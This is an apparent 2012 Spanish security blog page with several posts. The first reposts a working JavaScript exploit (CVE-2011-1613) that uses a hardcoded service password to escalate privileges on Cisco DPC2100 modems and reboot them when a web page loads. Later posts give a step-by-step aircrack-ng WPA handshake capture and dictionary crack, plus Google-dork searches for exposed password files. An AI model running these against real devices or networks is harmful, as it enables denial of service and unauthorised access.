Ads 468x60px

Image and video hosting by TinyPic

sábado, 29 de septiembre de 2012

Vulnerabilidad Cisco


Hola a todos!

Nueva vulnerabilidad en Cisco, su autor: Daniel Smith, aún no se ha verificado, sin mas os dejo con el código:

# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010

# Author: Daniel Smith
# Software Link: http://www.cisco.com/

# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7

# CVE: CVE-2011-1613


=======================================================
 Information

=======================================================
Executing this script on page load will cause the users modem to restart when

they visit the page. This example uses javascript but can just as easily written
to in another language to accomplish something similar. Attack consists of

two parts.


Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl

PARAMS: SAAccessLevel=2&SAPassword=W2402


Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan

PARAMS: SADownStartingFrequency=705000000


=======================================================
 Proof of Concept (Javascript)

=======================================================
(function() {

  var b=document.getElementsByTagName('body')[0];
  var otherlib=false;

  
  if(typeof jQuery!='undefined') {

    console.log('This page already using jQuery v'+jQuery.fn.jquery);
  } else if (typeof $=='function') {

    otherlib=true;
  }

  function getScript(url,success){
    var script=document.createElement('script');

    script.src=url;
    var head=document.getElementsByTagName('head')[0],

        done=false;
    // Attach handlers for all browsers

    script.onload=script.onreadystatechange = function(){
      if ( !done && (!this.readyState

           || this.readyState == 'loaded'
           || this.readyState == 'complete') ) {

        done=true;
        success();

        script.onload = script.onreadystatechange = null;
        head.removeChild(script);

      }
    };

    head.appendChild(script);
  }

  getScript('http://code.jquery.com/jquery-latest.min.js',function() {
    if (typeof jQuery=='undefined') {

      console.log('Sorry, but jQuery wasn\'t able to load');
    } else {

      console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
    $.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );

      console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
    $.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );

      console.log('Reboot command sent.');
    }

  });
})();



Autor: Daniel Smith


No seáis malos. ;)

jueves, 27 de septiembre de 2012

Intitle


Hola a todos!

Como ya os comente en anteriores artículos.Vamos a seguir publicando artículos del maravilloso mundo del Google Hacking y el Footprinting.

Como ya explique en el anterior artículo a título de recordatorio el Footprinting consiste en la búsqueda de información, que puede ser pública, es decir, dicha información el administrador del servidor la publico a propósito o por el contrario fue expuesta por error o desconocimiento. Con lo cual al ser información publica no es delito.

¿Que información podemos obtener?

Podemos obtener de todo, desde usuarios y contraseñas del cpanel, mail, bases de datos, archivos, directorios ocultos.

Vamos con un verbo de los muchos que existen, mas concreto con el verbo intitle, en español en el título.

Abrimos el navegador y tecleamos lo siguiente:




Con esto le decimos a Google que nos liste todas las páginas que contengan en el titulo passwd, con lo cual nos lista las páginas con directorios abiertos, con título passwd.
Podemos apreciar que Google nos ha dado muchos, vamos con uno al azar. 



Hay vemos como nos lista los directorios el servidor, por cierto es un Apache, con sistema operativo Ubuntu. 


Abracadabra abrimos la carpeta census y vemos carpetas con posibles nombres de usuarios.



Efectivamente estaba en lo cierto nombres de usuarios del sistema.
Volvemos a la carpeta anterior /passwd para entrar en la carpeta passwords.


Pero que ven mis ojos! otro ficherito, este con las contraseñas del sistema y encima las password por defecto de la historia.

Seguiremos con  mas artículos de Footprinting y mas Google Hacking próximamente.


No seáis malos. ;)

miércoles, 26 de septiembre de 2012

Sparktrust


Hola a todos!

¿Has sido hackeado? ¿Te gustaría saber si un sitio ha sido hacheado?
Sparktrust nos trae una herramienta en el que podemos analizar un sitio para ver si esta comprometido por malware.

Sparktrust es una empresa de seguridad Web, visitamos su Web.
A continuación en la parte inferior de la Web hay un scanner, en el introducimos la url a analizar.









El scanner de SparkTrust es gratuito y muy sencillo de utilizar, simplemente como dije hay que ingresar una URL y esperar el resultado. Como podrás apreciar en la siguiente captura, se buscan distintos tipos de códigos maliciosos y se verifica la lista negra de Google Safe Browsing.

Come veis mi Web sale todo bien. No hay malware, ni a sido hackeada.




Como veis, es una buena utilidad para saber más sobre algunos sitios.

No seáis malos. ;)

martes, 25 de septiembre de 2012

¿Y tú de quien eres?


Hola a todos!

Nueva sección: ¿Y tú de quien eres? En esta nueva sección podrás promocionar tus programitas. ¿Eres desarrollador? ¿Programador? Pues no lo dudes y promociónate aquí, sobre todo para particulares y empresas que estáis empezando y queréis dar a conocer vuestro software a la comunidad, por supuesto la promoción es totalmente gratuita.

El software, de cualquier plataforma o sistema, Android, IOS, Windows, Linux. Mac.
Tenéis que vender bien  vuestro producto, no hay limite de tamaño, a ver, tampoco escribáis el Quijote. ;)





Reglas

- El artículo se envía en formato doc o docx, podéis añadir imágenes y todo ira comprimido en zip.
- El artículo siempre se debe tratar con respeto, es decir, no ofender a nada, ni a nadie.
- No se publicara nada que este fuera de la ley, como robos, ataques, nada de seriales de programas, sólo se admitirá aquellos artículos que sostengan las bases del hacking ético.

Envíanos tu software como ya hizo en su día Laura Núñez que nos trajo su aplicación Prot-On.
Como comente, se publicará el artículo que nos mandéis de vuestra aplicación y se incluirá en nuestra página de Herramientas de forma permanente.

Así que ya sabéis una forma de dar a conocer vuestras aplicaciones, no lo dudéis y enviárnoslas.


No seáis malos.

viernes, 21 de septiembre de 2012

Hardening


Hola a todos!

Hardening en informática, endurecimiento es en general el proceso de asegurar un sistema mediante la reducción de vulnerabilidad.
Es una técnica compuesta por un conjunto de acciones responsabilidad del administrador de sistemas para reforzar al máximo posible la seguridad de este.

También es una estrategia defensiva de protege contra los ataques, cerrando “huecos” de seguridad y asegurando los controles de acceso. Este proceso incluye la evaluación de arquitectura de seguridad de una empresa y la auditoría de la configuración de sus sistemas con el fin de desarrollar e implementar procedimientos de consolidación para asegurar sus recursos críticos. 

Sistemas Soportados

  • Linux
  • Router y Switches
  • MSSQL Database
  • UNIX Server
  • Windows Desktop
  • Windows Server


Esta práctica se puede hacer de una forma más fácil utilizando la herramienta de seguridad grsecurity. Grsecurity es una herramienta que ofrece seguridad proactiva, establece controles del sistema a modo de parche del Kernel.


Entre sus controles de seguridad implementados en el sistema destacan:


  •       La protección a nivel de funcionamiento del kernel.
  •       Prevención de la ejecución del código arbitrario.
  •       Control de ejecución de las tareas en el stack.
  •       Control de las actividades de los usuarios.
  •       Permisos de ejecución en determinadas áreas del sistema.
  •       Implementación de controles adicionales a la seguridad impuesta por chroot.
  •       Alarmas e intervenciones de seguridad que contienen el IP del que causa la alarma.
  •       Implementación de un control de acceso basado en roles (RBAC).



No seáis malos. ;)

miércoles, 19 de septiembre de 2012

Software Marketing


Hola a todos!

¿Os habéis fijado cuantas empresas o software informático han utilizado animales para logotipos?

Es curioso, pero es así, hay un montón de software que utiliza animales, por ejemplo la Foca,  de Chema Alonso, software Made In Spain, esa graciosa y famosa Foca rosa con su cara de “malota” con la que podemos sacarle el jugo a los documentos.



Wireshark, ese tiburón, o mejor dicho esa aleta amenazadora de tiburón que todo lo esnifea.



Quien no conoce a Emule, la mula o burrito mas famoso del mundo, quien no se ha descargado alguna película, música con el.



Amrarok significa lobo en el idioma inukitut. Es un reproductor de audio, versátil y funcional, desarrollado en principio para entornos KDE.



El cliente de correo Thunderbird con ese pájaro portando nuestros mensajes.



Agnitum-Spam-Terrier  es un programa que se integra en tu gestor de correo (Outlook y Outlook Express) y espera al acecho como un perro de presa a que entre algún mensaje de correo basura, entonces, Agnitum Spam Terrier le dará un buen bocado y lo mandará directamente a la carpeta de correo no deseado.



Vuze utiliza como logo una rana exótica, con ella buscaremos y descargaremos archivos torrent.



No podríamos olvidarnos del famoso antivirus Panda.



Open Office, el paquete de oficina mas parecido a Microsoft Office, a diferencia de Microsoft Open Office es software libre, por cierto las gaviotas de su logo, ¿no os recuerda a un partido político?



MySQL con ese inteligente animalito que a todo el mundo cae bien, el delfín.




¿Y vosotros conocéis alguno? 


No seáis malos

lunes, 17 de septiembre de 2012

No abandones tu PC, el nunca no lo haría


Hola a todos!

Iba el otro día paseando con mi perro como todas las mañanas, cuando de vuelta a casa, mis ojos no podían creer lo que veían, pegado a los contenedores de basura una torre de pc nueva no tendría mas de 2-3 años, con todos sus periféricos y componentes, monitor LCD, teclado y ratón inalámbrico, webcam etcétera.

No querría parecer ser un chatarrero, pero la chatarra se paga bien ;), bromas a parte, podía aprovechar alguna que otra pieza o si se encontraba por dentro igual de bien que lo estaba por fuera podía tener un pc nuevo.

Pero antes de disponerme a deshuesar al pc mi curiosidad emergió de repente con gran intensidad. ¿Y si? ¿A ver? …..
Pensé si podría sacar algún dato jugoso de aquel abandonado pc. No penséis que use los programas más destacados para el análisis forense, ni las más sofisticadas técnicas hacker para sacar jugo al pc abandonado.

Nada de eso, fue más sencillo de lo que creéis, primero el usuario no estaba protegido por contraseña, por lo que no tuve que usar aplicaciones como el Ophcrack para sacar la password. Por cierto el pc corría con un Windows vista.



Una vez dentro era coser y cantar, a la mayoría os parecerá obvio, hasta los que tienen unos mínimos conocimientos de informática, pero aún hay gente que no saben salvaguardar su privacidad en los navegadores, no sólo para el exterior, sino para los demás usuarios de un mismo pc.

Con el modo privado de los navegadores evitamos que guarde los historiales de navegación, cookies, usuarios, contraseñas, formularios etcétera. Bueno en este pc pude ver todo el historial de navegación de esta persona, su sexo, de que país era, evidentemente por que todas las direcciones apuntaban a un país concreto.
Todo la carpeta usuario, C:\, aquí se podría haber usado algún tipo de cifrado como bitlocker para cifrar todo C:\.



Me dispuse haber si cazaba algún usuario y contraseña del navegador, y si tenía habilitado el recordar contraseñas en el navegador, con lo que me dio el usuario y contraseña de Tuenti, Facebook, Gmail y un portal de descarga de software llamado CondescargaDirecta.



Entramos por ejemplo en Mozilla Firefox, opciones, seguridad y contraseñas guardadas.
Y nos aparecerá en texto plano la el sitio o Web, el usuario y la contraseña.  



En la informática y sobre todo en la seguridad siempre se esta empezando, porque digo esto, porque algunas paginas que visitaba esta persona eran de seguridad, hacking, y tenia algún que otro programa de (botón gordo), como CAIN, como comente antes este artículo puede parecer para los mas experimentados en la materia que sea obvio, básico, somos humanos. Profesionales de la seguridad pueden estar en este momento intentando desencriptar algún complejo algoritmo o compilando su nuevo software pero olvidan cosas que no son de primero, son de preescolar.

Los accidentes en la mayoría de los casos suceden con los conductores más experimentados porque ya vamos confiados en la carretera seguros que lo hacemos todo bien y después esa parsimonia hace que nos la peguemos, sin embargo los conductores noveles van mas atentos a los que pueda pasar, no se les escapa nada.
Estar muy atentos porque a veces las cosas más obvias o monótonas son las se nos escapa. Deshabilitar la opción o navegar de forma privada.

He de decir que no conocía a la persona del pc, ni el porque tiró el pc, le envíe un correo para que cambiará todas las passwords, el pc se formateo, y se deshueso para aprovechar algunas piezas. Ah! me dijo que cada dos años cambia de pc.

No seáis malos, saludos. 

miércoles, 12 de septiembre de 2012

Permisos Peligrosos

Hola a todos!

La movilidad sigue siendo uno de los principales segmentos que está impulsando el crecimiento del mercado de las TI. Según un estudio publicado por ABI Research, las ventas de smartphones, netbooks, teléfonos y otros dispositivos móviles alcanzarán este año los 1,200 millones de unidades a nivel mundial, una cifra que podría superar los 2,250 millones de dispositivos en 2014.


Esta claro que estos dispositivos llegaron con fuerza y seguirá en el futuro, por ello los malos también se han puesto las pilas, el malware en dispositivos móviles es una realidad.

Les interesa nombres de usuario y contraseñas, formularios, documentos privados, mensajes premium, secuestro del dispositivo.



Usuario y contraseña:
Robando el usser y la pass serán capaces de suplantar nuestra identidad de la aplicación, por ejemplo redes sociales.

Formularios:
Aquí les interesa sobre todo los formularios relativos a compras online, donde se puede acceder a datos personales de interés.

Mensajes premium:
Con esto generaran un beneficio a nuestra costa, siendo capaz el teléfono infectado de enviar o suscribirse a mensajes Premium de gran coste.

Secuestro del dispositivo:
Tal como dice secuestran el teléfono, es decir bloquean el teléfono para que no pueda ser utilizado, sino se conoce el código. También es posible deshabilitar las llamadas.

A continuación daremos un listado de los permisos más solicitados por aplicaciones con código malicioso para infectar a dispositivos moviles.

  • Leer estado del teléfono
  • Enviar SMS
  • Escribir almacenamiento externo
  • Recibir SMS
  • Leer contactos
  • Escribir SMS
  • Llamar al teléfono
  • Activar bloqueo
  • Cambiar la configuración
  • Leer registros
  • Escribir contactos
  • Escribir la configuración APN: Access point name
  • Sistema alerta Windows (Windows mobile)
  • Cámara
  • Conseguir tareas
  • Escribir la configuración
  • Desmontar sistemas de archivos
  • Recibir MMS
  • Bluetooth
  • Modificar la configuración de audio
  • Cambiar estado de wifi
  • Cambiar el estado de la red
  • Leer calendario
  • Modificar calendario de teléfono


No seáis malos, saludos.

lunes, 10 de septiembre de 2012

Tablet anti-hacker rusa


Hola a todos!

Los rusos están preparandos para lanzar una nueva table que ejecuta un sistema operativo parecido a Android, pero no tendra nada que ver con Google. El nombre del sistema operativo es Romos, está diseñado ante todo para uso militar, y la seguridad es su prioridad, el sistema no comparte los datos con Google.

El gobierno ruso quiere una tablet que pueda ejecutar algunas aplicaciones conocidas, pero sin correr riesgos de seguridad, y consideran que Google es un riesgo.



Como he comentado antes, sus uso es militar, pero si, se han acordado de los civiles, habrá una versión comercial con acabado muy robusto, incluso resistente al agua.
Se conoce que llegará a finales de este año 2012. Su precio unos US$465 aproximadamente.
Ah! no usa GPS convencional, sino usa Glonass que es el sistema de navegación ruso.


No seáis malos, saludos.

viernes, 7 de septiembre de 2012

Footprinting


Hola a todos!

Footprinting, huella es español, es una técnica con la cual se adquiere información de los sistemas informáticos, información necesaria que iremos recolectando para posibles futuros ataques.

Con esta técnica es posible conseguir información importante comos puedes ser: las entidades a los que pertenece dichos sistemas informáticos, sistemas operativos etcétera.

Vamos a intentar recopilar información de un servidor, para ello nos conectaremos remotamente como cliente por telnet, telnet para los que no lo sepáis es un protocolo cliente/servidor, rula por el puerto 23, con telnet sólo se accede por Terminal, nada de entorno gráfico.

Abrimos nuestro Terminal, en mi caso Bactrack, aseguraos que tenéis salida a Internet, con ello hacemos un ping a alguna Web, por ejemplo:
ping www.google.es  

Bien, seguimos, ahora tecleamos el siguiente comando:

A continuación:
Get/index.html HTTP/1.1




Como podéis ver este dominio no da mucha información, habría que ir probando con otros directorios aparte del index a ver si se le puede sacar más jugo o con otro dominio, a probar chic@s esta semana.
En futuros artículos seguiremos hablando del Footprinting.

Hasta la próxima, saludos.

jueves, 6 de septiembre de 2012

Hackean al PP

Hola a todos!
La página Web del Partido Popular de la localidad de Getafe, fue ayer hackeada por una persona que se identificado como DavO, coloco un mensaje de protesta contra los recortes del Gobierno y pidió a los políticos que se bajen el sueldo y se dejen de lujos innecesarios. Que ya esta bien de tener al pueblo asfixiado. Mientras ellos viene de lujo. Esta última frase es cortesía de un servidor.
El mensaje saltaba cuando el usuario entraba en la pestaña actualidad o al pinchar en alguna de las dos noticias destacadas de la home, pone que "no queremos más recortes, ni más IVA". "Bájense ustedes el sueldo y déjense de lujos innecesarios, como hoteles de cinco estrellas".

A media mañana de hoy miércoles cuando escribo esto la web aún no había recuperado la normalidad. En directorios de la Web, como en la pestaña actualidad nos salía este mensaje de error: "La pagina que ha solicitado no existe".

No seáis malos, saludos.

miércoles, 5 de septiembre de 2012

Auditar Wifi (WPA)


Hola a todos!

Hoy he pensado en auditar mi red inalámbrica, aunque estaba seguro que mi red era lo bastante robusta, con una clave lo bastante fuerte, con caracteres especiales, números y letras mayúsculas y minúsculas y el acceso protegido con WPA2, siempre queda el “por si acaso”.

Me dispuse a ello, cogí mi distribución favorita Bactrack y vamos a ver que sucedió.

1º Poner la tarjeta en modo monitor
airmon-ng start wlan0

2º El siguiente paso es escanear las redes que nos rodea, en este caso la mía.
airodump-ng mon0



3º Ahora me asocio a la red para capturar el handshake, esto el paquete especial que se transmite cuando nos conectamos al punto de acceso, así que ya os imagináis ¿no? vamos a interceptar la clave que viene el handshake.
airodump-ng -c CANAL –bssid BSSID –w NombreDeArchivo mon0



4º Abrimos otro terminal para ahora si capturar el handshake, eso si, es impresindible que haya un cliente conectado, sino no tendréis éxito alguno.
aireplay-ng –deauth 20 -a BSSID -c CLIENTE mon0



5º Sólo falta volver a la consola anterior y comprobar si hemos tenido éxito, como se puede ver nos saldrá arriba a la derecha “WPA handshake MAC”.



6º Bien ya tenemos el handshake, sólo falta comprobar la contraseña que tenemos con un buen diccionario. Esto consiste en buscar la contraseña en un archivo de texto, ira mirando hasta que coincida alguna palabra del diccionario con la clave, y nos saldrá la contraseña.
aircrack-ng -a 2 -w /ruta/al/diccionario NombreDeArchivo-01.cap



En mi caso probé varios días y con distintos diccionarios y no pudo sacarme la clave, por ahora tengo una buena password.

¿Y tu, as auditado tu Wifi?


Hasta la próxima, saludos.

lunes, 3 de septiembre de 2012

Delete


Hola a todos!

¿Creéis que cuando borráis un archivo en vuestro sistema operativo este se borra correctamente?
La respuesta es NO, cuando borramos un archivo este va directamente a la papelera de reciclaje, lugar en el que quedan temporalmente a la espera de ser eliminados definitivamente o por el contrario, si fue eliminado por error su restauración.

Aún así cuando decimos vaciar la papelera de reciclaje tampoco quedan borrados. Este espacio del disco duro queda vacío, es decir, al borrar esa parte del disco duro donde por ejemplo se encontraba la carpeta fotos, esta parte del disco duro ahora esta libre para que otro contenido ocupe su lugar, pueda sobrescribir.

Y se podría recuperar todo lo borrado anteriormente.

Existen muchos programas de borrado seguro como Eraser o recuperador de archivos borrados como Recuva.
Borrando de forma segura nuestros archivos equivale a lo suelen hacer las empresas con la trituración de papel. Con el borrado seguro preservamos la confidencialidad.
Yo os recomendaría hacer esto cuando estéis en un pc que no sea el vuestro, como el del trabajo, pc de un amigo, en clase etcétera.

Ah! tampoco penséis que formateando el ordenador os libraréis de los archivos, ya que con herramientas forenses se puede acceder a los archivos borrados del sistema.
Os preguntaréis ¿Por qué no lo hace este trabajo el S.O? pues por lo de siempre…
Es un proceso muy lento que dejaría al sistema operativo más de una vez KO, tardaría horas cada día.

Hasta la próxima, saludos.



Related Posts Plugin for WordPress, Blogger...
 

X1RED+SEGURA

Spy Block

COLABORA

 
cookie script